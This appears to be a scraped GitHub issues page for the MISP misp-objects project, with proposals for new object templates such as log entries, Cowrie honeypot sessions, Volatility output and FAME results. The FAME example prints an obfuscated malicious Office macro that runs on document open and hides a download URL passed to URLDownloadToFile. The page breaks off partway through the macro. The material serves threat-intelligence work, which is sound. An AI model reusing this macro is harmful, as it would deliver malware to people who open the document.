misp / misp-objects Goto Github PK
View Code? Open in Web Editor NEWDefinition, description and relationship types of MISP objects
Home Page: https://www.misp-project.org/objects.html
License: Other
misp-objects's Issues
Object: Log Entry
It would be nice to have an dedicated object for "log-Entry" that then can be used to build a timeline
- Timestampt (UTC)
- Timestamp description (e.g. in what log have you found it)
- System (e.g. which system is your log entry covering)
- Event description / raw log line
- Notes
- involved user
- Added by
- malicious yes / no
That way you could create a nice timeline during an investigation
R2graphity Object requires fields which do not exist
All (or almost all, I have not completely checked) the fields listed in "requiredOneOf" are not element of R2graphity Object.
sandbox-signature
I see there is sandbox-report object where is possible to load the raw output from a sandbox but there isn't a tiny object such as sandbox-signature where can put the signatures that are matching (like av-signature object).
Example of signatures:
json of signatures:
At least to have the description and the name, with data (also if is interesting) object will go wider.
I'm wondering something like this definition.json:
What do you think?
TODO PE sections
Content:
- name
- entropy
Script object template
Script object template - to store extracted evidence where a script is involved (from PowerShell to bash) and allow to trace timelines with the object relationship and maybe extend MISP to have syntax highlighting for such object.
Remove correlation from some URL object attributes
copied issue from MISP/MISP#2618
For some fields in the URL objects correlation does not make sense
- scheme
- TLD
- Port
- subdomain if it is "www"
IP Port - perhaps change the required attributes
Currently IP OR port are enough to satisfy the requirements of the object - maybe we should require both, or change the name ;)
url object - url can be "required" instead of "requiredOneOf"
Since there is only one field that can be required... Required one of one is the same as Required
TODO Attacker and victim objects
Attacker:
- name
- comment
- ip
- asn
- asn-name
- geo
- uri
- whois-text
- //source-comment
Victim
- ip
- asn
- asn-name
- geo
- uri
- //comment
Extend whois object + misp attributes
- add new misp attribute
whois-registrant-org(used by domaintools for example) - add new object relation to whois field
registrant-org - rename
registanttoregistrantin whois object
Cowrie honeypot object
Cowrie honeypot object first version released.
| Object attribute | MISP attribute type | Description | Disable correlation |
|---|---|---|---|
| message | text | Message of the cowrie honeypot | |
| username | text | Username related to the password(s) | |
| protocol | text | Protocol used in the cowrie honeypot | |
| src_ip | ip-src | Source IP address of the session | |
| eventid | text | Eventid of the session in the cowrie honeypot | |
| dst_ip | ip-dst | Destination IP address of the session | |
| session | text | Session id | |
| system | text | System origin in cowrie honeypot | |
| src_port | port | Source port of the session | |
| timestamp | datetime | When the event happened | |
| sensor | text | Cowrie sensor name | |
| passsword | text | Password | |
| isError | text | isError | |
| dst_port | port | Destination port of the session |
https://www.misp-project.org/objects.html#_cowrie
Based on the following discussion on Twitter, we might need to update the object to support malware sample collected and SSH meta information.
Hive object
validHIVES=['HKCC', 'HKCR', 'HKCU', 'HKDD', 'HKEY_CLASSES_ROOT', 'HKEY_CURRENT_CONFIG', 'HKEY_CURRENT_USER', 'HKEY_DYN_DATA', 'HKEY_LOCAL_MACHINE', 'HKEY_PERFORMANCE_DATA', 'HKEY_USERS', 'HKLM', 'HKPD', 'HKU']
from https://github.com/jeffbryner/pyioc/blob/master/client/iocItems/RegistryItem.py
Key
Subkey
Value
Timestamp
Whois object - typo
"registar": {
"description": "Registar of the whois entry",
"ui-priority": 0,
"misp-attribute": "whois-registar"
}
Should be whois-registrar
Comon name for the security code of a credit card is CVV (Card Verification Value)
Most of the vendors will call he security code CVV (i.e. Amazon: https://www.amazon.in/gp/help/customer/display.html?nodeId=201461830), so it might be good to rename it:
What do you think?
ASN object to add
ASN object including ASN number, description, country code, list of subnet announced (multiple), first_seen, last_seen, import(multiple), export (multiple), mp-import (multiple), mp-export (multiple).
Volatility - objects
mutantscan
JSON export field name
"columns": [
"Offset(P)",
"Pointers",
"Handles",
"Signal",
"Thread",
"CID",
"Name"
]
[33379968, 1, 1, "1", 0, "", ""], [33382448, 2, 1, "1", 0, "", "746bbf3569adEncrypt"], [33387864, 1, 1, "1", 0, "", ""], [33394584, 1, 1, "1", 0, "", ""], [33427592, 2, 1, "1", 0, "", "_SHuassist.mtx"]
SSDT
"columns": [
"Table",
"TableOffset",
"NumEntries",
"Entry",
"Addr",
"Function",
"Owner"
]
[
"SSDT[1]",
3214515072,
667,
4761,
3214226858,
"NtGdiUMPDEngFreeUserMem",
"win32k.sys"
],
[
"SSDT[1]",
3214515072,
667,
4762,
3212932649,
"NtGdiDrawStream",
"win32k.sys"
]
modules
"columns": [
"Offset(V)",
"Name",
"Base",
"Size",
"File"
]
[
2182709560,
"ParVdm.SYS",
4173201408,
8192,
"\\SystemRoot\\System32\\Drivers\\ParVdm.SYS"
],
[
2183500848,
"srv.sys",
4152414208,
335872,
"\\SystemRoot\\system32\\DRIVERS\\srv.sys"
],
[
2182893856,
"HTTP.sys",
4150018048,
266240,
"\\SystemRoot\\System32\\Drivers\\HTTP.sys"
]
connscan
{
"rows": [
[
34108960,
"172.16.112.128:1038",
"41.168.5.140:8080",
1484
],
[
37388296,
"172.16.112.128:1037",
"125.19.103.198:8080",
1484
]
],
"columns": [
"Offset(P)",
"LocalAddress",
"RemoteAddress",
"PID"
]
}
This one can be easily mapped to netflow object.
wireshark format object
{"timestamp" : "1038497564094", "layers" : {"frame": {"frame_frame_encap_type": "1","frame_frame_time": "Nov 28, 2002 16:32:44.094214000 CET","frame_frame_offset_shift": "0.000000000","frame_frame_ti
me_epoch": "1038497564.094214000","frame_frame_time_delta": "0.135987000","frame_frame_time_delta_displayed": "0.135987000","frame_frame_time_relative": "294.809766000","frame_frame_number": "32","fr
ame_frame_len": "220","frame_frame_cap_len": "220","frame_frame_marked": "0","frame_frame_ignored": "0","frame_frame_protocols": "eth:ethertype:ip:udp:dns"},"eth": {"eth_eth_dst": "00:80:5f:25:84:37"
,"eth_dst_eth_dst_resolved": "CompaqCo_25:84:37","eth_dst_eth_addr": "00:80:5f:25:84:37","eth_dst_eth_addr_resolved": "CompaqCo_25:84:37","eth_dst_eth_lg": "0","eth_dst_eth_ig": "0","eth_eth_src": "0
0:01:02:09:88:f9","eth_src_eth_src_resolved": "BbnBoltB_09:88:f9","eth_src_eth_addr": "00:01:02:09:88:f9","eth_src_eth_addr_resolved": "BbnBoltB_09:88:f9","eth_src_eth_lg": "0","eth_src_eth_ig": "0",
"eth_eth_type": "0x00000800"},"ip": {"ip_ip_version": "4","ip_ip_hdr_len": "20","ip_ip_dsfield": "0x00000000","ip_dsfield_ip_dsfield_dscp": "0","ip_dsfield_ip_dsfield_ecn": "0","ip_ip_len": "206","ip
_ip_id": "0x00008903","ip_ip_flags": "0x00000000","ip_flags_ip_flags_rb": "0","ip_flags_ip_flags_df": "0","ip_flags_ip_flags_mf": "0","ip_ip_frag_offset": "0","ip_ip_ttl": "61","ip_ip_proto": "17","i
p_ip_checksum": "0x0000afd5","ip_ip_checksum_status": "2","ip_ip_src": "194.154.192.1","ip_ip_addr": "194.154.192.1","ip_ip_src_host": "194.154.192.1","ip_ip_host": "194.154.192.1","ip_ip_dst": "192.
168.1.2","ip_ip_addr": "192.168.1.2","ip_ip_dst_host": "192.168.1.2","ip_ip_host": "192.168.1.2","ip_text": "Source GeoIP: Luxembourg","text_ip_geoip_src_country": "Luxembourg","text_ip_geoip_country
": "Luxembourg","ip_text": "Destination GeoIP: Unknown"},"udp": {"udp_udp_srcport": "53","udp_udp_dstport": "1025","udp_udp_port": "53","udp_udp_port": "1025","udp_udp_length": "186","udp_udp_checksu
m": "0x0000d8a6","udp_udp_checksum_status": "2","udp_udp_stream": "2"},"dns": {"dns_dns_response_to": "31","dns_dns_time": "0.135987000","dns_dns_id": "0x00004e02","dns_dns_flags": "0x00008580","dns_
flags_dns_flags_response": "1","dns_flags_dns_flags_opcode": "0","dns_flags_dns_flags_authoritative": "1","dns_flags_dns_flags_truncated": "0","dns_flags_dns_flags_recdesired": "1","dns_flags_dns_fla
gs_recavail": "1","dns_flags_dns_flags_z": "0","dns_flags_dns_flags_authenticated": "0","dns_flags_dns_flags_checkdisable": "0","dns_flags_dns_flags_rcode": "0","dns_dns_count_queries": "1","dns_dns_
count_answers": "1","dns_dns_count_auth_rr": "2","dns_dns_count_add_rr": "2","dns_text": "Queries","text_text": "71.60.64.158.in-addr.arpa: type PTR, class IN","text_dns_qry_name": "71.60.64.158.in-a
ddr.arpa","text_dns_qry_name_len": "25","text_dns_count_labels": "6","text_dns_qry_type": "12","text_dns_qry_class": "0x00000001","dns_text": "Answers","text_text": "71.60.64.158.in-addr.arpa: type P
TR, class IN, gilmore.ael.be","text_dns_resp_name": "71.60.64.158.in-addr.arpa","text_dns_resp_type": "12","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "16","
text_dns_ptr_domain_name": "gilmore.ael.be","dns_text": "Authoritative nameservers","text_text": "60.64.158.in-addr.arpa: type NS, class IN, ns arthur.crpht.lu","text_dns_resp_name": "60.64.158.in-ad
dr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "17","text_dns_ns": "arthur.crpht.lu","text_text": "60.64.158.in-addr.arpa: ty
pe NS, class IN, ns dorado.crpht.lu","text_dns_resp_name": "60.64.158.in-addr.arpa","text_dns_resp_type": "2","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "86400","text_dns_resp_len": "9"
,"text_dns_ns": "dorado.crpht.lu","dns_text": "Additional records","text_text": "arthur.crpht.lu: type A, class IN, addr 158.64.4.8","text_dns_resp_name": "arthur.crpht.lu","text_dns_resp_type": "1",
"text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "58747","text_dns_resp_len": "4","text_dns_a": "158.64.4.8","text_text": "dorado.crpht.lu: type A, class IN, addr 158.64.4.9","text_dns_resp_n
ame": "dorado.crpht.lu","text_dns_resp_type": "1","text_dns_resp_class": "0x00000001","text_dns_resp_ttl": "56032","text_dns_resp_len": "4","text_dns_a": "158.64.4.9"}}}
Email object has invalid attribute defined
email-xmailer doesn't exist, email-x-mailer is the correct type.
weblog format (as used by Manati)
weblog format (as used by Manati and bro)
Object for AFF4 (metadata)
Object for AFF4
FAME format
{
"analysis": {
"support_files": {},
"logs": [
"2017-03-24 11:17: debug: Trying to queue module 'apk'",
"2017-03-24 11:17: debug: Trying to queue module 'eml'",
"2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
"2017-03-24 11:17: debug: Trying to queue module 'pdf'",
"2017-03-24 11:17: debug: Trying to queue module 'zip'",
"2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
"2017-03-24 11:17: debug: Trying to run office_macros",
"2017-03-24 11:17: debug: Done with office_macros"
],
"extractions": [],
"results": {
"office_macros": {
"macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While 